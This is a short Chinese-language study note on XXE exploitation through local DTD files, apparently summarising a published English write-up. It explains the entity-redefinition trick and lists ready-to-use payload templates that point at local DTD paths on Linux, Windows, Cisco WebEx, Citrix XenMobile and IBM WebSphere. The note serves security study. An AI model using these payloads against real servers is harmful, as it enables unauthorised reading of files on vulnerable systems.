参考资料来自https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
一、为什么要使用本地DTD
-
libxml在2.9.1之后禁用了外部实体
-
存在xxe漏洞的服务器可能存在防火墙,连接不到外部实体。
二、利用方式
截了作者利用成功的截图。
这里前面的aaa)和后面多余的内容相当于在原本dtd中进行一个闭合操作。
sip-app_1_0.dtd这个文件中可以看见pattern (%condition;),在构造好的payload中也有这个参数实体。
It works because all XML entities are constant. If you define two entities with the same name, only the first one will be used.
原文是这样的,大意是如果定义了两个相同名字的实体,只有第一个会被使用
利用方式和之前学习的非常相似,难点在于如何寻找本地dtd。
扫描二维码关注公众号,回复:
9769039 查看本文章
三、寻找常见本地DTD
Custom Linux System <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamsa 'Your DTD code'> %local_dtd; Custom Windows System <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'> %local_dtd; Thanks to @Mike_n1 from Positive Technologies for sharing this path of always-existing Windows DTD file. Cisco WebEx <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'> %local_dtd; Citrix XenMobile Server <!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"> <!ENTITY % Body '>Your DTD code<!ENTITY test "test"'> %local_dtd; Custom Multi-Platform IBM WebSphere Application <!ENTITY % local_dtd SYSTEM "./../../properties/schemas/j2ee/XMLSchema.dtd"> <!ENTITY % xs-datatypes 'Your DTD code'> <!ENTITY % simpleType "a"> <!ENTITY % restriction "b"> <!ENTITY % boolean "(c)"> <!ENTITY % URIref "CDATA"> <!ENTITY % XPathExpr "CDATA"> <!ENTITY % QName "NMTOKEN"> <!ENTITY % NCName "NMTOKEN"> <!ENTITY % nonNegativeInteger "NMTOKEN"> %local_dtd;